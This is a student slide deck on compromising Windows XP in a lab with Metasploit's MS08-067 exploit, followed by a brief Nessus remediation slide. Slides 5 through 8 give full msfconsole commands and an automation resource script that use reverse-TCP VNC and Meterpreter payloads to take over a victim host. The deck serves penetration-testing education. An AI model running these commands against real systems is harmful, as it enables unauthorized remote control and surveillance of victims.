A quick guide for windows machine hacking and remedies.

1. Compromising windows
XP and Remedies
Bikrant Gautam, MSIA
St. Cloud State University

2. Overview
✘ Terminologies explained
✘ Deploying attack
✘ Automating attacks
✘ Mitigating measures
✘ Conclusion

3. Methodology Overview
● Probe target
● Find vulnerabilities
● Pass information to
exploit
● Find target
● Find Vulnerability
● Load Exploit
● Load Payload
● Setup Listener
● Exploit
Scanning
Attacking

4. Targeting Victims
The victim, name: bikrant1 ip: 192.168.1.9 The Attacker, target- vulnerable

5. Launching the Attack (visual)
Result ===>
Victim OS
everything user
does on this
computer is
visible to the
attacker once the
exploit is
successful
Attacking
System
Everything victim
does is seen from
Kali Linux using
TightVNC console.Exploit Code:
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload windows/vncinject/reverse_tcp
> check
> exploit

6. Attack continued(console)
Using MeterPreter
Exploit Script
> sudo msfconsole
> use exploit/windows/smb/ms08_067_netapi
> set target 0
> set rhost 192.168.1.9
> set lhost 192.168.1.6
> set lport 4321
> set payload
windows/meterpreter/reverse_tcp
> check
> exploit
● Different than previous one
● Has access to the command line
● Can create/delete or even execute new
scripts or command

7. Automating the Attack
Using bash script to automate the attacks
requirement:
> script needs to be created at specific folder of
metasploit framework.
> script once written can be invoked with
msfconsole command.
-----------------------------------------------------------------
> go to location: usr/share/metasploit-
framework/scripts/meterpreter
> create a file meterpreter.rc using nano or touch
> include the following script:
use exploit/windows/smb/ms08_067_netapi
set target 0
set rhost 192.168.1.9
set lhost 192.168.1.10
set lport 4321
set payload windows/vncinject/reverse_tcp
exploit

8. Automating the Attack (2)
Using python to automate attack
complex requirement:
> need to download correct library to initiate attack.
> package is msfrpc from github
> execute similar action as from bash scripting
-----------------------------------------------------------------
Difference from Bash Script:
> Difficult to implement.
> Depends on python version.
> Code cannot be run in other system
without setting up complete environment.
Initializing the attack

9. Preventing the Attack
Scanning for Vulnerabilities using Nessus
> scan the device (provide IP to Nessus)
> run the scan
> drill down on the critical and high
vulnerabilities
> read the description and adopt the solution
suggested

10. Conclusion
● Security is evolving process.
● New vulnerabilities are introduced each day
● Penetration and scanning helps you see what’s wrong
with your system
● Helps you understand what can be done once the
exploit is executed
● “Best defense can only be implemented once you know
your weakest point”

11. Questions?